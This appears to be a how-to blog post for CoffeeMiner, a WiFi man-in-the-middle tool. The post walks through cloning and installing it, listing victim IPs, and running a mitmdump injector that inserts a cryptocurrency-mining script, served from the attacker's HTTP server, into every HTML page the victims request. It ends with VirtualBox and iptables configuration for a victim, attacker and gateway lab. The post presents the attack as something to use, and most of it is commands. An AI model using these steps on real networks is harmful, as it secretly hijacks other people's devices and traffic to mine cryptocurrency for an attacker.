How To Use CoffeeMiner - WiFi MITM Cryptocurrency Mining Pool

Cryptocurrency Miners are in rise from previous year, nearly 600 millions computers are continually mining cryptoCurrency through their browsers without user’s knowledge. But this CoffeeMiner works differently through intercepting traffic and route to injected HTML pages for mining, that HTML pages contains javascript that force all devices which are connected to WiFi network to mine cryptocurrency for an attacker.

Concept:

Performs a MITM attack to all selected victims
Injects a js script in all the HTML pages requested by the victims
The js script injected contains a cryptocurrency miner
All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

How To Use CoffeeMiner – WiFi MITM Cryptocurrency Mining Pool

First, We’re going to Download or Git CoffeeMiner.

$ git clone https://github.com/arnaucode/coffeeMiner.git

1	$ git clone https://github.com/arnaucode/coffeeMiner.git

After that we’re going to run ‘install.sh‘ bash file.

install.sh

$ bash install.sh

1	$ bash install.sh

edit victims.txt with one IP per line
edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:

os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

1	os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

When everything’s completed, we’re simply going to execute and run that coffeeMiner.py file.

execute coffeeMiner.py

$ python3 coffeeMiner.py ipgateway

1	$ python3 coffeeMiner.py ipgateway

Instructions to setup VirtualBox scenario

In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:

nameserver 8.8.8.8

1	nameserver 8.8.8.8

Victim

network adapter:
- Host-only Adapter
/etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.20
    netmask 255.255.255.0
    gateway 10.0.2.15

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet static

address 10.0.2.20

netmask 255.255.255.0

gateway 10.0.2.15

Attacker

network adapter:
- Host-only Adapter
/etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.10
    netmask 255.255.255.0
    gateway 10.0.2.15

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet static

address 10.0.2.10

netmask 255.255.255.0

gateway 10.0.2.15

Gateway

network adapter:
- Bridged Adapter
- Host-only Adapter
/etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
    address 10.0.2.15
    netmask 255.255.255.0

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet dhcp

auto eth1

iface eth1 inet static

address 10.0.2.15

netmask 255.255.255.0

Clean IPTABLES:

iptables --flush
iptables --table nat --flush

1 2	iptables --flush iptables --table nat --flush

Configure the Gateway machine as a router:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT

iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

Download CoffeeMiner